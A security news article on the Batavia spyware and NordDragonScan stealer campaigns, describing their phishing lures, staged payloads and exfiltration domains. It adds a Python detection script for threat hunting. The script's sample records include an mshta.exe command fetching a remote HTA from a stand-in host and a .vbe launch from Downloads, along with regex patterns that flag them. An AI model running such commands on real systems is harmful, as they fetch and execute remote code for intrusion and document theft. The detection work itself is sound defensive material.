A new and previously undocumented Windows spyware, dubbed Batavia, has been actively targeting Russian organizations since July 2024 as part of a sophisticated cyber espionage campaign. Security researchers at Kaspersky have been tracking the activity, which appears to focus on the exfiltration of sensitive internal documents.
Batavia Spyware Targets Russian Organizations
The campaign commences with deceptive phishing emails masquerading as contract proposals, originating from the domain “oblast-ru[.]com,” which is reportedly controlled by the attackers. These emails contain malicious links designed to trick recipients into downloading an archive file. Upon execution, this archive deploys a Visual Basic Encoded script (.VBE) that collects system information and sends it to a remote server.
Following the initial compromise, the attackers retrieve a second-stage payload, an executable developed in Delphi. This malware displays what is believed to be a fake contract to the victim as a distraction while it covertly gathers system logs, office documents in various formats, and screenshots. Data collection also extends to any removable devices connected to the infected host.
The Delphi malware possesses the capability to download additional binaries from the remote server, broadening its data exfiltration scope. These secondary payloads target a wider range of file extensions, including images, emails, presentations, archives, and text-based documents. The newly acquired data is then transmitted to a separate domain, “ru-exchange[.]com,” where a further, unknown executable is downloaded to perpetuate the attack chain.
Telemetry data gathered by Kaspersky indicates that over 100 individuals across numerous organizations have fallen victim to these phishing emails in the past year. The primary objective of Batavia appears to be the comprehensive theft of victim documents alongside system-level information, such as installed programs, drivers, and operating system components.
Broader Trends in Windows Malware Delivery
The emergence of Batavia highlights a persistent threat landscape for Windows users. In parallel, Fortinet FortiGuard Labs has detailed a separate malicious campaign distributing a Windows stealer malware codenamed NordDragonScan. While the exact entry point for NordDragonScan is not definitively known, it is suspected to involve phishing emails that direct users to download a RAR archive.
Once installed, NordDragonScan is designed to scan compromised systems, copy documents, harvest entire user profiles from both Google Chrome and Mozilla Firefox browsers, and capture screenshots. This multifaceted approach suggests a broad objective of intelligence gathering and potential espionage.
The RAR archive associated with NordDragonScan contains a Windows shortcut (.LNK) file that discreetly utilizes “mshta.exe” to execute a remotely hosted HTML Application (HTA). This step serves to display a benign decoy document to the user, while a malicious .NET payload is stealthily installed on the system in the background. The stolen information is then exfiltrated to a remote server via HTTP POST requests.
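Both chains described above hinge on an abused living-off-the-land binary: Batavia starts with a .VBE script run by the Windows Script Host from a downloaded archive, and NordDragonScan starts with a .LNK that hands "mshta.exe" a remotely hosted HTA. The following is an added example (not code from Kaspersky, Fortinet, or the malware) showing how a detection engineer might hunt for both patterns in process-creation telemetry. It operates on constructed, Sysmon-style event records embedded inline; the field names, file paths and URLs are assumptions for illustration, not indicators from the reports.

```python
import ntpath
import re

# Constructed Sysmon Event ID 1 style process-creation records for illustration only.
# None of these paths, hosts or file names are real indicators from the campaigns.
SAMPLE_EVENTS = [
    {   # NordDragonScan-like: LNK from Explorer launches mshta.exe with a remote HTA
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" http://decoy.example.invalid/contract.hta',
    },
    {   # Batavia-like: Windows Script Host runs an encoded VBScript extracted to Downloads
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\wscript.exe",
        "CommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\contract\dogovor.vbe"',
    },
    {   # Benign: mshta.exe running a locally installed HTA, no remote URL
        "ParentImage": r"C:\Program Files\Vendor\App.exe",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\setup.hta"',
    },
    {   # Benign: administrative script from a managed location
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\cscript.exe",
        "CommandLine": r"cscript.exe //nologo C:\Scripts\inventory.vbs",
    },
]

# A URL on the mshta.exe command line means the HTA is fetched over the network.
REMOTE_URL = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
# Plain or encoded VBScript (.vbs / .vbe) handed to the Windows Script Host.
SCRIPT_EXT = re.compile(r"\.vb[es]\b", re.IGNORECASE)
# User-writable locations where a freshly downloaded archive would be extracted.
# Which directories count as "user-writable" is an assumed tuning choice.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(Downloads|AppData|Desktop|Documents)\\|\\Temp\\",
    re.IGNORECASE,
)


def detect(events):
    """Return (rule_name, command_line) for every event matching a hunting rule."""
    findings = []
    for ev in events:
        image = ntpath.basename(ev["Image"]).lower()
        cmd = ev["CommandLine"]
        if image == "mshta.exe" and REMOTE_URL.search(cmd):
            # mshta.exe asked to execute HTML Application content from a remote host
            findings.append(("mshta_remote_hta", cmd))
        elif image in ("wscript.exe", "cscript.exe") and SCRIPT_EXT.search(cmd) \
                and USER_WRITABLE.search(cmd):
            # Script host executing VBScript from a location a phishing lure would land in
            findings.append(("script_host_vbscript_user_path", cmd))
    return findings


def rule_names(events):
    """Convenience helper: just the rule names that fired, in event order."""
    return [rule for rule, _ in detect(events)]


if __name__ == "__main__":
    for rule, cmd in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {cmd}")
```

The two benign records show why the rules key on the argument pattern rather than on the binary name alone: mshta.exe and the script hosts are legitimate Windows components, so blocking or alerting on every invocation produces noise. In a real deployment the parent-process field is a useful extra signal (an Explorer parent is consistent with a double-clicked .LNK or extracted script), and the URL regex should be paired with a proxy or DNS lookup to confirm that an outbound request to the host actually occurred.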
The ongoing development and deployment of sophisticated spyware like Batavia and stealer malware such as NordDragonScan underscore the evolving tactics of threat actors. Organizations are advised to maintain vigilant cybersecurity practices, including up-to-date threat intelligence, robust endpoint detection, and comprehensive user awareness training to mitigate the risks associated with these evolving threats.

